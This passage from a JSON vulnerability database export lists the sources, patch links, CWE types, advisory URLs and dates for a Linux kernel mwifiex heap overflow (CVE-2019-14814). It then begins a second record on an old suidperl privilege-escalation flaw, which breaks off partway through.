          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-14814",
        "trust": 3.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2019/08/28/1",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "154951",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "156020",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "154897",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156202",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0415",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3570",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3064",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3835",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3817",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.3897",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154933",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156190",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "156202"
      },
      {
        "db": "PACKETSTORM",
        "id": "156190"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "id": "VAR-201909-1527",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.25113124
  },
  "last_update_date": "2023-12-18T10:56:30.365000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "mwifiex: Fix three heap overflow at parsing element in cfg80211_ap_settings",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Bug 1744130",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14814"
      },
      {
        "title": "CVE-2019-14814",
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2019-14814"
      },
      {
        "title": "Linux kernel Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=97668"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-122",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-120",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 4.0,
        "url": "http://www.openwall.com/lists/oss-security/2019/08/28/1"
      },
      {
        "trust": 2.5,
        "url": "https://access.redhat.com/security/cve/cve-2019-14814"
      },
      {
        "trust": 2.3,
        "url": "https://access.redhat.com/errata/rhsa-2020:0339"
      },
      {
        "trust": 2.2,
        "url": "https://usn.ubuntu.com/4157-1/"
      },
      {
        "trust": 2.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0174"
      },
      {
        "trust": 1.7,
        "url": "https://access.redhat.com/errata/rhsa-2020:0328"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00064.html"
      },
      {
        "trust": 1.6,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/155212/slackware-security-advisory-slackware-14.2-kernel-updates.html"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14814"
      },
      {
        "trust": 1.6,
        "url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3a"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00001.html"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 1.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 1.6,
        "url": "https://seclists.org/bugtraq/2019/nov/11"
      },
      {
        "trust": 1.6,
        "url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4157-2/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-1/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4162-2/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-1/"
      },
      {
        "trust": 1.6,
        "url": "https://usn.ubuntu.com/4163-2/"
      },
      {
        "trust": 1.4,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
      },
      {
        "trust": 1.4,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
      },
      {
        "trust": 0.9,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14814"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:1016"
      },
      {
        "trust": 0.6,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7caac62ed598a196d6ddf8d9c121e12e082cac3a"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1744130"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192658-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192651-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2020:0374"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-net-wireless-marvell-mwifiex-30180"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0415/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3835/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156020/red-hat-security-advisory-2020-0174-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/154897/ubuntu-security-notice-usn-4157-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156202/red-hat-security-advisory-2020-0339-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.3897/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3064/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-14815"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-14816"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14835"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10905"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.2,
        "url": "https://usn.ubuntu.com/4157-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19338"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19338"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17666"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14895"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/3523601"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-3693"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-18559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-3846"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-8912"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11487"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11487"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-18559"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-8912"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-3693"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-18660"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11478"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11477"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-12614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14284"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14283"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20961"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14835"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-20976"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17133"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14816"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-16746"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-2215"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15118"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-10905"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17056"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14821"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-15098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17075"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-17055"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-15505"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17052"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.0.0-32.34~18.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4157-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1023.23~18.04.2"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "156202"
      },
      {
        "db": "PACKETSTORM",
        "id": "156190"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "PACKETSTORM",
        "id": "156202"
      },
      {
        "db": "PACKETSTORM",
        "id": "156190"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "date": "2020-01-21T19:10:15",
        "db": "PACKETSTORM",
        "id": "156020"
      },
      {
        "date": "2019-10-23T18:32:10",
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "date": "2019-11-08T15:37:19",
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "date": "2019-10-17T15:18:45",
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "date": "2019-10-22T17:26:37",
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "date": "2020-02-04T14:59:17",
        "db": "PACKETSTORM",
        "id": "156202"
      },
      {
        "date": "2020-02-04T14:42:51",
        "db": "PACKETSTORM",
        "id": "156190"
      },
      {
        "date": "2019-09-20T19:15:11.690000",
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "date": "2019-08-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      },
      {
        "date": "2023-09-28T19:09:03.420000",
        "db": "NVD",
        "id": "CVE-2019-14814"
      },
      {
        "date": "2023-03-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "154951"
      },
      {
        "db": "PACKETSTORM",
        "id": "154897"
      },
      {
        "db": "PACKETSTORM",
        "id": "154933"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to classic buffer overflow",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-009587"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201908-2185"
      }
    ],
    "trust": 0.6
  }
}

var-199606-0003
Vulnerability from variot

The suidperl and sperl program do not give up root privileges when changing UIDs back to the original users, allowing root access. HP-UX is prone to a local privilege-escalation vulnerability. Local attackers may exploit this issue to gain root privileges

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-199606-0003",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "a ux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "apple",
        "version": "3.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
